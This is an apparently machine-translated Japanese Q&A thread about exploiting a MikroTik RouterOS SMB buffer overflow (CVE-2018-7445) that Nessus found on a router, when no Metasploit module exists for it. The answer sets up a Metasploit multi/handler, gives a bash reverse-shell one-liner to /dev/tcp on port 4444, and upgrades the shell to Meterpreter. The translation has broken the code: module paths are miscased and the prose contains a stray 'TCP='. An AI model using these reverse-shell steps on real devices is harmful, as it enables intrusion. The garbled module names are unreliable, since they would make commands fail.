web-dev-qa-db-ja.com

Nessusは脆弱性を発見しましたが、Metasploitに対応するエクスプロイトはありません:meterpreterで実行する方法

Nessusをローカルネットワークで実行したところ、ルーターに重大な脆弱性が見つかりました。

MikroTik RouterOS < 6.41.3 SMB Buffer Overflow

(脆弱性の説明: Exploit-db

しかし、この脆弱性のメタスプロイトに対応するエクスプロイトは見つかりません。 msfconsoleでsearch CVE-2018-7445が結果を返しませんでした。

Meterpreterでmetasploitのエクスプロイトを使用する方法はありますか?

2
Johnny Pralo

基本的には、exploit-dbリンクのエクスプロイトを使用してシェルを取得し、Metasploitハンドラーを開始する必要があります。

use exploit/multi/handler
set LHOST [local ip address]
set LPORT 4444
set payload linux/x86/Shell/reverse_tcp
run

ペイロードハンドラーが実行されたら、ルーターから逆のTCP=接続を確立して、Metasploitでセッションを取得できます。

bash -i >& /dev/tcp/[local ip address]/4444 0>&1

次に、セッションのバックグラウンドを設定し、モジュールを使用します post/multi/manage/Shell_to_meterpreter シェルをMeterpreterシェルにアップグレードします。

1
Joe